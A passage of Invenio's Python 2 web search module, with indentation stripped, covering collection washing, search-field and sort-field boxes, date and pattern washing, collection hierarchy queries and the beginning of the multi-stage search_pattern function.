if self_p and cc != CFG_SITE_NAME:
dads.append((cc, get_coll_i18nname(cc, ln, False)))
return websearch_templates.tmpl_navtrail_links(
aas=aas, ln=ln, dads=dads)
def get_searchwithin_fields(ln='en', colID=None):
"""Retrieves the fields name used in the 'search within' selection box for the collection ID colID."""
res = None
if colID:
res = run_sql("""SELECT f.code,f.name FROM field AS f, collection_field_fieldvalue AS cff
WHERE cff.type='sew' AND cff.id_collection=%s AND cff.id_field=f.id
ORDER BY cff.score DESC, f.name ASC""", (colID,))
if not res:
res = run_sql("SELECT code,name FROM field ORDER BY name ASC")
fields = [{
'value' : '',
'text' : get_field_i18nname("any field", ln, False)
}]
for field_code, field_name in res:
if field_code and field_code != "anyfield":
fields.append({ 'value' : field_code,
'text' : get_field_i18nname(field_name, ln, False)
})
return fields
def get_sortby_fields(ln='en', colID=None):
"""Retrieves the fields name used in the 'sort by' selection box for the collection ID colID."""
_ = gettext_set_language(ln)
res = None
if colID:
res = run_sql("""SELECT DISTINCT(f.code),f.name FROM field AS f, collection_field_fieldvalue AS cff
WHERE cff.type='soo' AND cff.id_collection=%s AND cff.id_field=f.id
ORDER BY cff.score DESC, f.name ASC""", (colID,))
if not res:
# no sort fields defined for this colID, try to take Home collection:
res = run_sql("""SELECT DISTINCT(f.code),f.name FROM field AS f, collection_field_fieldvalue AS cff
WHERE cff.type='soo' AND cff.id_collection=%s AND cff.id_field=f.id
ORDER BY cff.score DESC, f.name ASC""", (1,))
if not res:
# no sort fields defined for the Home collection, take all sort fields defined wherever they are:
res = run_sql("""SELECT DISTINCT(f.code),f.name FROM field AS f, collection_field_fieldvalue AS cff
WHERE cff.type='soo' AND cff.id_field=f.id
ORDER BY cff.score DESC, f.name ASC""",)
fields = [{
'value' : '',
'text' : _("latest first")
}]
for field_code, field_name in res:
if field_code and field_code != "anyfield":
fields.append({ 'value' : field_code,
'text' : get_field_i18nname(field_name, ln, False)
})
return fields
def create_andornot_box(name='op', value='', ln='en'):
"Returns HTML code for the AND/OR/NOT selection box."
_ = gettext_set_language(ln)
out = """
<select name="%s">
<option value="a"%s>%s
<option value="o"%s>%s
<option value="n"%s>%s
</select>
""" % (name,
is_selected('a', value), _("AND"),
is_selected('o', value), _("OR"),
is_selected('n', value), _("AND NOT"))
return out
def create_matchtype_box(name='m', value='', ln='en'):
"Returns HTML code for the 'match type' selection box."
_ = gettext_set_language(ln)
out = """
<select name="%s">
<option value="a"%s>%s
<option value="o"%s>%s
<option value="e"%s>%s
<option value="p"%s>%s
<option value="r"%s>%s
</select>
""" % (name,
is_selected('a', value), _("All of the words:"),
is_selected('o', value), _("Any of the words:"),
is_selected('e', value), _("Exact phrase:"),
is_selected('p', value), _("Partial phrase:"),
is_selected('r', value), _("Regular expression:"))
return out
def is_selected(var, fld):
"Checks if the two are equal, and if yes, returns ' selected'. Useful for select boxes."
if type(var) is int and type(fld) is int:
if var == fld:
return " selected"
elif str(var) == str(fld):
return " selected"
elif fld and len(fld)==3 and fld[0] == "w" and var == fld[1:]:
return " selected"
return ""
def wash_colls(cc, c, split_colls=0, verbose=0):
"""Wash collection list by checking whether user has deselected
anything under 'Narrow search'. Checks also if cc is a list or not.
    Return a tuple (cc, colls_to_display, colls_to_search, hosted_colls,
    debug), since the list of collections to display is different from
    the list of collections to search in. This is because users might
    have chosen the 'split by collection' functionality.
The behaviour of "collections to display" depends solely whether
user has deselected a particular collection: e.g. if it started
from 'Articles and Preprints' page, and deselected 'Preprints',
then collection to display is 'Articles'. If he did not deselect
anything, then collection to display is 'Articles & Preprints'.
The behaviour of "collections to search in" depends on the
'split_colls' parameter:
         * if it is equal to 0, then we keep the washed colls list as is
           and search solely in the collection(s) the user started from;
         * if it is non-zero, then we are splitting to the first level
           of collections, i.e. collections as they appear on the page
           we started to search from;
The function raises exception
InvenioWebSearchUnknownCollectionError
if cc or one of c collections is not known.
"""
colls_out = []
colls_out_for_display = []
# list to hold the hosted collections to be searched and displayed
hosted_colls_out = []
debug = ""
if verbose:
debug += "<br />"
debug += "<br />1) --- initial parameters ---"
debug += "<br />cc : %s" % cc
debug += "<br />c : %s" % c
debug += "<br />"
# check what type is 'cc':
if type(cc) is list:
for ci in cc:
if collection_reclist_cache.cache.has_key(ci):
# yes this collection is real, so use it:
cc = ci
break
else:
# check once if cc is real:
if not collection_reclist_cache.cache.has_key(cc):
if cc:
raise InvenioWebSearchUnknownCollectionError(cc)
else:
cc = CFG_SITE_NAME # cc is not set, so replace it with Home collection
# check type of 'c' argument:
if type(c) is list:
colls = c
else:
colls = [c]
if verbose:
debug += "<br />2) --- after check for the integrity of cc and the being or not c a list ---"
debug += "<br />cc : %s" % cc
debug += "<br />c : %s" % c
debug += "<br />"
# remove all 'unreal' collections:
colls_real = []
for coll in colls:
if collection_reclist_cache.cache.has_key(coll):
colls_real.append(coll)
else:
if coll:
raise InvenioWebSearchUnknownCollectionError(coll)
colls = colls_real
if verbose:
debug += "<br />3) --- keeping only the real colls of c ---"
debug += "<br />colls : %s" % colls
debug += "<br />"
# check if some real collections remain:
if len(colls)==0:
colls = [cc]
if verbose:
debug += "<br />4) --- in case no colls were left we use cc directly ---"
debug += "<br />colls : %s" % colls
debug += "<br />"
# then let us check the list of non-restricted "real" sons of 'cc' and compare it to 'coll':
res = run_sql("""SELECT c.name FROM collection AS c,
collection_collection AS cc,
collection AS ccc
WHERE c.id=cc.id_son AND cc.id_dad=ccc.id
AND ccc.name=%s AND cc.type='r'""", (cc,))
# list that holds all the non restricted sons of cc that are also not hosted collections
l_cc_nonrestricted_sons_and_nonhosted_colls = []
res_hosted = run_sql("""SELECT c.name FROM collection AS c,
collection_collection AS cc,
collection AS ccc
WHERE c.id=cc.id_son AND cc.id_dad=ccc.id
AND ccc.name=%s AND cc.type='r'
AND (c.dbquery NOT LIKE 'hostedcollection:%%' OR c.dbquery IS NULL)""", (cc,))
for row_hosted in res_hosted:
l_cc_nonrestricted_sons_and_nonhosted_colls.append(row_hosted[0])
l_cc_nonrestricted_sons_and_nonhosted_colls.sort()
l_cc_nonrestricted_sons = []
l_c = colls[:]
for row in res:
if not collection_restricted_p(row[0]):
l_cc_nonrestricted_sons.append(row[0])
l_c.sort()
l_cc_nonrestricted_sons.sort()
if l_cc_nonrestricted_sons == l_c:
colls_out_for_display = [cc] # yep, washing permitted, it is sufficient to display 'cc'
    # the following elif is a hack that preserves the above functionality when we start searching from
# the frontpage with some hosted collections deselected (either by default or manually)
elif set(l_cc_nonrestricted_sons_and_nonhosted_colls).issubset(set(l_c)):
colls_out_for_display = colls
split_colls = 0
else:
colls_out_for_display = colls # nope, we need to display all 'colls' successively
# remove duplicates:
#colls_out_for_display_nondups=filter(lambda x, colls_out_for_display=colls_out_for_display: colls_out_for_display[x-1] not in colls_out_for_display[x:], range(1, len(colls_out_for_display)+1))
#colls_out_for_display = map(lambda x, colls_out_for_display=colls_out_for_display:colls_out_for_display[x-1], colls_out_for_display_nondups)
#colls_out_for_display = list(set(colls_out_for_display))
#remove duplicates while preserving the order
set_out = set()
colls_out_for_display = [coll for coll in colls_out_for_display if coll not in set_out and not set_out.add(coll)]
if verbose:
debug += "<br />5) --- decide whether colls_out_for_diplay should be colls or is it sufficient for it to be cc; remove duplicates ---"
debug += "<br />colls_out_for_display : %s" % colls_out_for_display
debug += "<br />"
# FIXME: The below quoted part of the code has been commented out
# because it prevents searching in individual restricted daughter
# collections when both parent and all its public daughter
# collections were asked for, in addition to some restricted
# daughter collections. The removal was introduced for hosted
# collections, so we may want to double check in this context.
# the following piece of code takes care of removing collections whose ancestors are going to be searched anyway
# list to hold the collections to be removed
#colls_to_be_removed = []
# first calculate the collections that can safely be removed
#for coll in colls_out_for_display:
# for ancestor in get_coll_ancestors(coll):
# #if ancestor in colls_out_for_display: colls_to_be_removed.append(coll)
# if ancestor in colls_out_for_display and not is_hosted_collection(coll): colls_to_be_removed.append(coll)
# secondly remove the collections
#for coll in colls_to_be_removed:
# colls_out_for_display.remove(coll)
if verbose:
debug += "<br />6) --- remove collections that have ancestors about to be search, unless they are hosted ---"
debug += "<br />colls_out_for_display : %s" % colls_out_for_display
debug += "<br />"
# calculate the hosted collections to be searched.
if colls_out_for_display == [cc]:
if is_hosted_collection(cc):
hosted_colls_out.append(cc)
else:
for coll in get_coll_sons(cc):
if is_hosted_collection(coll):
hosted_colls_out.append(coll)
else:
for coll in colls_out_for_display:
if is_hosted_collection(coll):
hosted_colls_out.append(coll)
if verbose:
debug += "<br />7) --- calculate the hosted_colls_out ---"
debug += "<br />hosted_colls_out : %s" % hosted_colls_out
debug += "<br />"
# second, let us decide on collection splitting:
if split_colls == 0:
# type A - no sons are wanted
colls_out = colls_out_for_display
else:
# type B - sons (first-level descendants) are wanted
for coll in colls_out_for_display:
coll_sons = get_coll_sons(coll)
if coll_sons == []:
colls_out.append(coll)
else:
for coll_son in coll_sons:
if not is_hosted_collection(coll_son):
colls_out.append(coll_son)
#else:
# colls_out = colls_out + coll_sons
# remove duplicates:
#colls_out_nondups=filter(lambda x, colls_out=colls_out: colls_out[x-1] not in colls_out[x:], range(1, len(colls_out)+1))
#colls_out = map(lambda x, colls_out=colls_out:colls_out[x-1], colls_out_nondups)
#colls_out = list(set(colls_out))
#remove duplicates while preserving the order
set_out = set()
colls_out = [coll for coll in colls_out if coll not in set_out and not set_out.add(coll)]
if verbose:
debug += "<br />8) --- calculate the colls_out; remove duplicates ---"
debug += "<br />colls_out : %s" % colls_out
debug += "<br />"
# remove the hosted collections from the collections to be searched
if hosted_colls_out:
for coll in hosted_colls_out:
try:
colls_out.remove(coll)
except ValueError:
# in case coll was not found in colls_out
pass
if verbose:
debug += "<br />9) --- remove the hosted_colls from the colls_out ---"
debug += "<br />colls_out : %s" % colls_out
return (cc, colls_out_for_display, colls_out, hosted_colls_out, debug)
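# Illustrative sketch of the wash_colls() return value (hypothetical
# collection tree, kept as a comment so that nothing is executed at import
# time): assuming a public collection 'Articles & Preprints' with the sons
# 'Articles' and 'Preprints', a call such as
#
#     wash_colls('Articles & Preprints', ['Articles'], split_colls=0)
#
# could return something like
#
#     ('Articles & Preprints', ['Articles'], ['Articles'], [], '')
#
# i.e. (cc, colls_to_display, colls_to_search, hosted_colls, debug).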
def get_synonym_terms(term, kbr_name, match_type, use_memoise=False):
"""
Return list of synonyms for TERM by looking in KBR_NAME in
MATCH_TYPE style.
@param term: search-time term or index-time term
@type term: str
@param kbr_name: knowledge base name
@type kbr_name: str
@param match_type: specifies how the term matches against the KBR
before doing the lookup. Could be `exact' (default),
        `leading_to_comma', `leading_to_number'.
@type match_type: str
@param use_memoise: can we memoise while doing lookups?
@type use_memoise: bool
@return: list of term synonyms
@rtype: list of strings
"""
dterms = {}
## exact match is default:
term_for_lookup = term
term_remainder = ''
## but maybe match different term:
if match_type == CFG_BIBINDEX_SYNONYM_MATCH_TYPE['leading_to_comma']:
mmm = re.match(r'^(.*?)(\s*,.*)$', term)
if mmm:
term_for_lookup = mmm.group(1)
term_remainder = mmm.group(2)
elif match_type == CFG_BIBINDEX_SYNONYM_MATCH_TYPE['leading_to_number']:
mmm = re.match(r'^(.*?)(\s*\d.*)$', term)
if mmm:
term_for_lookup = mmm.group(1)
term_remainder = mmm.group(2)
## FIXME: workaround: escaping SQL wild-card signs, since KBR's
## exact search is doing LIKE query, so would match everything:
term_for_lookup = term_for_lookup.replace('%', '\%')
## OK, now find synonyms:
for kbr_values in get_kbr_values(kbr_name,
searchkey=term_for_lookup,
searchtype='e',
use_memoise=use_memoise):
for kbr_value in kbr_values:
dterms[kbr_value + term_remainder] = 1
## return list of term synonyms:
return dterms.keys()
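# Illustrative sketch of get_synonym_terms() (hypothetical knowledge base
# content, kept as a comment so that nothing is executed at import time):
# with a journal-name KB that maps 'Phys. Rev.' to 'Physical Review', a call
# such as
#
#     get_synonym_terms('Phys. Rev., D', 'JOURNALS',
#                       CFG_BIBINDEX_SYNONYM_MATCH_TYPE['leading_to_comma'])
#
# would look up only the part before the comma ('Phys. Rev.') and re-append
# the remainder, so it could return something like ['Physical Review, D'].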
def wash_output_format(format):
"""Wash output format FORMAT. Currently only prevents input like
'of=9' for backwards-compatible format that prints certain fields
only. (for this task, 'of=tm' is preferred)"""
if str(format[0:3]).isdigit() and len(format) != 6:
# asked to print MARC tags, but not enough digits,
# so let's switch back to HTML brief default
return 'hb'
else:
return format
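# Illustrative sketch of wash_output_format() (kept as a comment so that
# nothing is executed at import time):
#
#     wash_output_format('245')      # -> 'hb'      (too few digits for a MARC tag)
#     wash_output_format('245__a')   # -> '245__a'  (full 6-character MARC tag kept)
#     wash_output_format('hx')       # -> 'hx'      (non-numeric formats pass through)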
def wash_pattern(p):
"""Wash pattern passed by URL. Check for sanity of the wildcard by
removing wildcards if they are appended to extremely short words
    (1-3 letters). TODO: instead of this approximate treatment, it
    would be much better to introduce a time limit, e.g. to kill a
    query if it does not finish in 10 seconds."""
# strip accents:
# p = strip_accents(p) # FIXME: when available, strip accents all the time
# add leading/trailing whitespace for the two following wildcard-sanity checking regexps:
p = " " + p + " "
# replace spaces within quotes by __SPACE__ temporarily:
p = re_pattern_single_quotes.sub(lambda x: "'"+string.replace(x.group(1), ' ', '__SPACE__')+"'", p)
p = re_pattern_double_quotes.sub(lambda x: "\""+string.replace(x.group(1), ' ', '__SPACE__')+"\"", p)
p = re_pattern_regexp_quotes.sub(lambda x: "/"+string.replace(x.group(1), ' ', '__SPACE__')+"/", p)
# get rid of unquoted wildcards after spaces:
p = re_pattern_wildcards_after_spaces.sub("\\1", p)
# get rid of extremely short words (1-3 letters with wildcards):
#p = re_pattern_short_words.sub("\\1", p)
# replace back __SPACE__ by spaces:
p = re_pattern_space.sub(" ", p)
# replace special terms:
p = re_pattern_today.sub(time.strftime("%Y-%m-%d", time.localtime()), p)
# remove unnecessary whitespace:
p = string.strip(p)
# remove potentially wrong UTF-8 characters:
p = wash_for_utf8(p)
return p
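# Illustrative sketch of wash_pattern() (kept as a comment so that nothing is
# executed at import time):
#
#     wash_pattern('  "dark matter"  ')   # -> '"dark matter"'
#
# i.e. leading/trailing whitespace is stripped while spaces inside quoted
# phrases are preserved (they are temporarily replaced by __SPACE__ and
# restored afterwards).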
def wash_field(f):
"""Wash field passed by URL."""
if f:
# get rid of unnecessary whitespace and make it lowercase
# (e.g. Author -> author) to better suit iPhone etc input
# mode:
f = f.strip().lower()
# wash legacy 'f' field names, e.g. replace 'wau' or `au' by
# 'author', if applicable:
if CFG_WEBSEARCH_FIELDS_CONVERT:
f = CFG_WEBSEARCH_FIELDS_CONVERT.get(f, f)
return f
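# Illustrative sketch of wash_field() (kept as a comment so that nothing is
# executed at import time):
#
#     wash_field(' Author ')   # -> 'author'
#
# and, if CFG_WEBSEARCH_FIELDS_CONVERT contains a legacy mapping such as
# {'au': 'author'}, then wash_field('au') would return 'author' as well.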
def wash_dates(d1="", d1y=0, d1m=0, d1d=0, d2="", d2y=0, d2m=0, d2d=0):
"""
Take user-submitted date arguments D1 (full datetime string) or
    (D1Y, D1M, D1D) year, month, day tuple and D2 or (D2Y, D2M, D2D)
    and return a (datetext1, datetext2) pair of datetime strings in the
    YYYY-MM-DD HH:MM:SS format suitable for time-restricted searching.
Note that when both D1 and (D1Y, D1M, D1D) parameters are present,
the precedence goes to D1. Ditto for D2*.
Note that when (D1Y, D1M, D1D) are taken into account, some values
may be missing and are completed e.g. to 01 or 12 according to
whether it is the starting or the ending date.
"""
datetext1, datetext2 = "", ""
# sanity checking:
if d1 == "" and d1y == 0 and d1m == 0 and d1d == 0 and d2 == "" and d2y == 0 and d2m == 0 and d2d == 0:
return ("", "") # nothing selected, so return empty values
# wash first (starting) date:
if d1:
# full datetime string takes precedence:
datetext1 = d1
else:
# okay, first date passed as (year,month,day):
if d1y:
datetext1 += "%04d" % d1y
else:
datetext1 += "0000"
if d1m:
datetext1 += "-%02d" % d1m
else:
datetext1 += "-01"
if d1d:
datetext1 += "-%02d" % d1d
else:
datetext1 += "-01"
datetext1 += " 00:00:00"
# wash second (ending) date:
if d2:
# full datetime string takes precedence:
datetext2 = d2
else:
# okay, second date passed as (year,month,day):
if d2y:
datetext2 += "%04d" % d2y
else:
datetext2 += "9999"
if d2m:
datetext2 += "-%02d" % d2m
else:
datetext2 += "-12"
if d2d:
datetext2 += "-%02d" % d2d
else:
datetext2 += "-31" # NOTE: perhaps we should add max(datenumber) in
# given month, but for our quering it's not
# needed, 31 will always do
datetext2 += " 00:00:00"
# okay, return constructed YYYY-MM-DD HH:MM:SS datetexts:
return (datetext1, datetext2)
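# Illustrative sketch of wash_dates() (kept as a comment so that nothing is
# executed at import time):
#
#     wash_dates(d1y=2005, d1m=3)
#     # -> ('2005-03-01 00:00:00', '9999-12-31 00:00:00')
#
# i.e. missing parts of the starting date are completed towards the earliest
# possible moment and missing parts of the ending date towards the latest.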
def is_hosted_collection(coll):
"""Check if the given collection is a hosted one; i.e. its dbquery starts with hostedcollection:
Returns True if it is, False if it's not or if the result is empty or if the query failed"""
res = run_sql("SELECT dbquery FROM collection WHERE name=%s", (coll, ))
try:
return res[0][0].startswith("hostedcollection:")
except:
return False
def get_colID(c):
"Return collection ID for collection name C. Return None if no match found."
colID = None
res = run_sql("SELECT id FROM collection WHERE name=%s", (c,), 1)
if res:
colID = res[0][0]
return colID
def get_coll_normalised_name(c):
"""Returns normalised collection name (case sensitive) for collection name
C (case insensitive).
Returns None if no match found."""
try:
return run_sql("SELECT name FROM collection WHERE name=%s", (c,))[0][0]
except:
return None
def get_coll_ancestors(coll):
"Returns a list of ancestors for collection 'coll'."
coll_ancestors = []
coll_ancestor = coll
while 1:
res = run_sql("""SELECT c.name FROM collection AS c
LEFT JOIN collection_collection AS cc ON c.id=cc.id_dad
LEFT JOIN collection AS ccc ON ccc.id=cc.id_son
WHERE ccc.name=%s ORDER BY cc.id_dad ASC LIMIT 1""",
(coll_ancestor,))
if res:
coll_name = res[0][0]
coll_ancestors.append(coll_name)
coll_ancestor = coll_name
else:
break
# ancestors found, return reversed list:
coll_ancestors.reverse()
return coll_ancestors
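# Illustrative sketch of get_coll_ancestors() (hypothetical collection tree,
# kept as a comment so that nothing is executed at import time): with a tree
# Home > Articles & Preprints > Preprints, a call such as
#
#     get_coll_ancestors('Preprints')
#
# could return ['Home', 'Articles & Preprints'], i.e. the ancestors ordered
# from the root downwards.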
def get_coll_sons(coll, type='r', public_only=1):
"""Return a list of sons (first-level descendants) of type 'type' for collection 'coll'.
If public_only, then return only non-restricted son collections.
"""
coll_sons = []
query = "SELECT c.name FROM collection AS c "\
"LEFT JOIN collection_collection AS cc ON c.id=cc.id_son "\
"LEFT JOIN collection AS ccc ON ccc.id=cc.id_dad "\
"WHERE cc.type=%s AND ccc.name=%s"
query += " ORDER BY cc.score DESC"
res = run_sql(query, (type, coll))
for name in res:
if not public_only or not collection_restricted_p(name[0]):
coll_sons.append(name[0])
return coll_sons
class CollectionAllChildrenDataCacher(DataCacher):
"""Cache for all children of a collection (regular & virtual, public & private)"""
def __init__(self):
def cache_filler():
def get_all_children(coll, type='r', public_only=1):
"""Return a list of all children of type 'type' for collection 'coll'.
If public_only, then return only non-restricted child collections.
If type='*', then return both regular and virtual collections.
"""
children = []
if type == '*':
sons = get_coll_sons(coll, 'r', public_only) + get_coll_sons(coll, 'v', public_only)
else:
sons = get_coll_sons(coll, type, public_only)
for child in sons:
children.append(child)
children.extend(get_all_children(child, type, public_only))
return children
ret = {}
collections = collection_reclist_cache.cache.keys()
for collection in collections:
ret[collection] = get_all_children(collection, '*', public_only=0)
return ret
def timestamp_verifier():
return max(get_table_update_time('collection'), get_table_update_time('collection_collection'))
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
if not collection_allchildren_cache.is_ok_p:
raise Exception
except Exception:
collection_allchildren_cache = CollectionAllChildrenDataCacher()
def get_collection_allchildren(coll, recreate_cache_if_needed=True):
"""Returns the list of all children of a collection."""
if recreate_cache_if_needed:
collection_allchildren_cache.recreate_cache_if_needed()
if coll not in collection_allchildren_cache.cache:
return [] # collection does not exist; return empty list
return collection_allchildren_cache.cache[coll]
def get_coll_real_descendants(coll, type='_', get_hosted_colls=True):
"""Return a list of all descendants of collection 'coll' that are defined by a 'dbquery'.
IOW, we need to decompose compound collections like "A & B" into "A" and "B" provided
that "A & B" has no associated database query defined.
"""
coll_sons = []
res = run_sql("""SELECT c.name,c.dbquery FROM collection AS c
LEFT JOIN collection_collection AS cc ON c.id=cc.id_son
LEFT JOIN collection AS ccc ON ccc.id=cc.id_dad
WHERE ccc.name=%s AND cc.type LIKE %s ORDER BY cc.score DESC""",
(coll, type,))
for name, dbquery in res:
if dbquery: # this is 'real' collection, so return it:
if get_hosted_colls:
coll_sons.append(name)
else:
if not dbquery.startswith("hostedcollection:"):
coll_sons.append(name)
else: # this is 'composed' collection, so recurse:
coll_sons.extend(get_coll_real_descendants(name))
return coll_sons
def browse_pattern_phrases(req, colls, p, f, rg, ln=CFG_SITE_LANG):
"""Returns either biliographic phrases or words indexes."""
## is p enclosed in quotes? (coming from exact search)
if p.startswith('"') and p.endswith('"'):
p = p[1:-1]
p_orig = p
## okay, "real browse" follows:
## FIXME: the maths in the get_nearest_terms_in_bibxxx is just a test
if not f and string.find(p, ":") > 0: # does 'p' contain ':'?
f, p = string.split(p, ":", 1)
## do we search in words indexes?
# FIXME uncomment this
#if not f:
# return browse_in_bibwords(req, p, f)
coll_hitset = intbitset()
for coll_name in colls:
coll_hitset |= get_collection_reclist(coll_name)
index_id = get_index_id_from_field(f)
if index_id != 0:
browsed_phrases_in_colls = get_nearest_terms_in_idxphrase_with_collection(p, index_id, rg/2, rg/2, coll_hitset)
else:
browsed_phrases = get_nearest_terms_in_bibxxx(p, f, (rg+1)/2+1, (rg-1)/2+1)
while not browsed_phrases:
# try again and again with shorter and shorter pattern:
try:
p = p[:-1]
browsed_phrases = get_nearest_terms_in_bibxxx(p, f, (rg+1)/2+1, (rg-1)/2+1)
except:
# probably there are no hits at all:
#req.write(_("No values found."))
return []
        ## try to check hits in this particular collection selection:
browsed_phrases_in_colls = []
if 0:
for phrase in browsed_phrases:
phrase_hitset = intbitset()
phrase_hitsets = search_pattern("", phrase, f, 'e')
for coll in colls:
phrase_hitset.union_update(phrase_hitsets[coll])
if len(phrase_hitset) > 0:
# okay, this phrase has some hits in colls, so add it:
browsed_phrases_in_colls.append([phrase, len(phrase_hitset)])
## were there hits in collections?
if browsed_phrases_in_colls == []:
if browsed_phrases != []:
#write_warning(req, """<p>No match close to <em>%s</em> found in given collections.
#Please try different term.<p>Displaying matches in any collection...""" % p_orig)
## try to get nbhits for these phrases in any collection:
for phrase in browsed_phrases:
nbhits = get_nbhits_in_bibxxx(phrase, f, coll_hitset)
if nbhits > 0:
browsed_phrases_in_colls.append([phrase, nbhits])
return browsed_phrases_in_colls
def browse_pattern(req, colls, p, f, rg, ln=CFG_SITE_LANG):
"""Displays either biliographic phrases or words indexes."""
# load the right message language
_ = gettext_set_language(ln)
browsed_phrases_in_colls = browse_pattern_phrases(req, colls, p, f, rg, ln)
if len(browsed_phrases_in_colls) == 0:
req.write(_("No values found."))
return
## display results now:
out = websearch_templates.tmpl_browse_pattern(
f=f,
fn=get_field_i18nname(get_field_name(f) or f, ln, False),
ln=ln,
browsed_phrases_in_colls=browsed_phrases_in_colls,
colls=colls,
rg=rg,
)
req.write(out)
return
def browse_in_bibwords(req, p, f, ln=CFG_SITE_LANG):
"""Browse inside words indexes."""
if not p:
return
_ = gettext_set_language(ln)
urlargd = {}
urlargd.update(req.argd)
urlargd['action'] = 'search'
nearest_box = create_nearest_terms_box(urlargd, p, f, 'w', ln=ln, intro_text_p=0)
req.write(websearch_templates.tmpl_search_in_bibwords(
p = p,
f = f,
ln = ln,
nearest_box = nearest_box
))
return
def search_pattern(req=None, p=None, f=None, m=None, ap=0, of="id", verbose=0, ln=CFG_SITE_LANG, display_nearest_terms_box=True, wl=0):
"""Search for complex pattern 'p' within field 'f' according to
matching type 'm'. Return hitset of recIDs.
The function uses multi-stage searching algorithm in case of no
exact match found. See the Search Internals document for
detailed description.
    The 'ap' argument governs whether alternative patterns are to
    be used in case there is no direct hit for (p,f,m). For
    example, whether to replace non-alphanumeric characters by
    spaces if it would give some hits. See the Search Internals
    document for a detailed description. (ap=0 forbids the
    alternative pattern usage, ap=1 permits it.)
'ap' is also internally used for allowing hidden tag search
(for requests coming from webcoll, for example). In this
case ap=-9
The 'of' argument governs whether to print or not some
information to the user in case of no match found. (Usually it
prints the information in case of HTML formats, otherwise it's
silent).
The 'verbose' argument controls the level of debugging information
to be printed (0=least, 9=most).
All the parameters are assumed to have been previously washed.
This function is suitable as a mid-level API.
"""
_ = gettext_set_language(ln)
hitset_empty = intbitset()
# sanity check:
if not p:
hitset_full = intbitset(trailing_bits=1)
hitset_full.discard(0)
# no pattern, so return all universe
return hitset_full
# search stage 1: break up arguments into basic search units:
if verbose and of.startswith("h"):
t1 = os.times()[4]
basic_search_units = create_basic_search_units(req, p, f, m, of)
if verbose and of.startswith("h"):
t2 = os.times()[4]
write_warning("Search stage 1: basic search units are: %s" % cgi.escape(repr(basic_search_units)), req=req)
write_warning("Search stage 1: execution took %.2f seconds." % (t2 - t1), req=req)
# search stage 2: do search for each search unit and verify hit presence:
if verbose and of.startswith("h"):
t1 = os.times()[4]
basic_search_units_hitsets = []
#prepare hiddenfield-related..
myhiddens = CFG_BIBFORMAT_HIDDEN_TAGS
can_see_hidden = False
if req:
user_info = collect_user_info(req)
can_see_hidden = user_info.get('precached_canseehiddenmarctags', False)
if not req and ap == -9: # special request, coming from webcoll
can_see_hidden = True
if can_see_hidden:
myhiddens = []
if CFG_INSPIRE_SITE and of.startswith('h'):
# fulltext/caption search warnings for INSPIRE:
fields_to_be_searched = [f for o, p, f, m in basic_search_units]
if 'fulltext' in fields_to_be_searched:
write_warning( _("Warning: full-text search is only available for a subset of papers mostly from %(x_range_from_year)s-%(x_range_to_year)s.") % \
{'x_range_from_year': '2006',
'x_range_to_year': '2012'}, req=req)
elif 'caption' in fields_to_be_searched:
write_warning(_("Warning: figure caption search is only available for a subset of papers mostly from %(x_range_from_year)s-%(x_range_to_year)s.") % \
{'x_range_from_year': '2008',
'x_range_to_year': '2012'}, req=req)
for idx_unit in xrange(len(basic_search_units)):
bsu_o, bsu_p, bsu_f, bsu_m = basic_search_units[idx_unit]
if bsu_f and len(bsu_f) < 2:
if of.startswith("h"):
write_warning(_("There is no index %s. Searching for %s in all fields." % (bsu_f, bsu_p)), req=req)
bsu_f = ''
bsu_m = 'w'
if of.startswith("h") and verbose:
write_warning(_('Instead searching %s.' % str([bsu_o, bsu_p, bsu_f, bsu_m])), req=req)
try:
basic_search_unit_hitset = search_unit(bsu_p, bsu_f, bsu_m, wl)
except InvenioWebSearchWildcardLimitError, excp:
basic_search_unit_hitset = excp.res
if of.startswith("h"):
write_warning(_("Search term too generic, displaying only partial results..."), req=req)
# FIXME: print warning if we use native full-text indexing
if bsu_f == 'fulltext' and bsu_m != 'w' and of.startswith('h') and not CFG_SOLR_URL:
write_warning(_("No phrase index available for fulltext yet, looking for word combination..."), req=req)
#check that the user is allowed to search with this tag
#if he/she tries it
if bsu_f and len(bsu_f) > 1 and bsu_f[0].isdigit() and bsu_f[1].isdigit():
for htag in myhiddens:
ltag = len(htag)
samelenfield = bsu_f[0:ltag]
if samelenfield == htag: #user searches by a hidden tag
#we won't show you anything..
basic_search_unit_hitset = intbitset()
if verbose >= 9 and of.startswith("h"):
write_warning("Pattern %s hitlist omitted since \
it queries in a hidden tag %s" %
(cgi.escape(repr(bsu_p)), repr(myhiddens)), req=req)
display_nearest_terms_box = False #..and stop spying, too.
if verbose >= 9 and of.startswith("h"):
write_warning("Search stage 1: pattern %s gave hitlist %s" % (cgi.escape(bsu_p), basic_search_unit_hitset), req=req)
if len(basic_search_unit_hitset) > 0 or \
ap<1 or \
bsu_o=="|" or \
((idx_unit+1)<len(basic_search_units) and basic_search_units[idx_unit+1][0]=="|"):
# stage 2-1: this basic search unit is retained, since
# either the hitset is non-empty, or the approximate
# pattern treatment is switched off, or the search unit
# was joined by an OR operator to preceding/following
# units so we do not require that it exists
basic_search_units_hitsets.append(basic_search_unit_hitset)
else:
# stage 2-2: no hits found for this search unit, try to replace non-alphanumeric chars inside pattern:
if re.search(r'[^a-zA-Z0-9\s\:]', bsu_p) and bsu_f != 'refersto' and bsu_f != 'citedby':
if bsu_p.startswith('"') and bsu_p.endswith('"'): # is it ACC query?
bsu_pn = re.sub(r'[^a-zA-Z0-9\s\:]+', "*", bsu_p)
else: # it is WRD query
bsu_pn = re.sub(r'[^a-zA-Z0-9\s\:]+', " ", bsu_p)
if verbose and of.startswith('h') and req:
write_warning("Trying (%s,%s,%s)" % (cgi.escape(bsu_pn), cgi.escape(bsu_f), cgi.escape(bsu_m)), req=req)
basic_search_unit_hitset = search_pattern(req=None, p=bsu_pn, f=bsu_f, m=bsu_m, of="id", ln=ln, wl=wl)
if len(basic_search_unit_hitset) > 0:
# we retain the new unit instead
if of.startswith('h'):
write_warning(_("No exact match found for %(x_query1)s, using %(x_query2)s instead...") % \
{'x_query1': "<em>" + cgi.escape(bsu_p) + "</em>",
'x_query2': "<em>" + cgi.escape(bsu_pn) + "</em>"}, req=req)
basic_search_units[idx_unit][1] = bsu_pn
basic_search_units_hitsets.append(basic_search_unit_hitset)
else:
# stage 2-3: no hits found either, propose nearest indexed terms:
if of.startswith('h') and display_nearest_terms_box:
if req:
if bsu_f == "recid":
write_warning(_("Requested record does not seem to exist."), req=req)
else:
write_warning(create_nearest_terms_box(req.argd, bsu_p, bsu_f, bsu_m, ln=ln), req=req)
return hitset_empty
else:
# stage 2-3: no hits found either, propose nearest indexed terms:
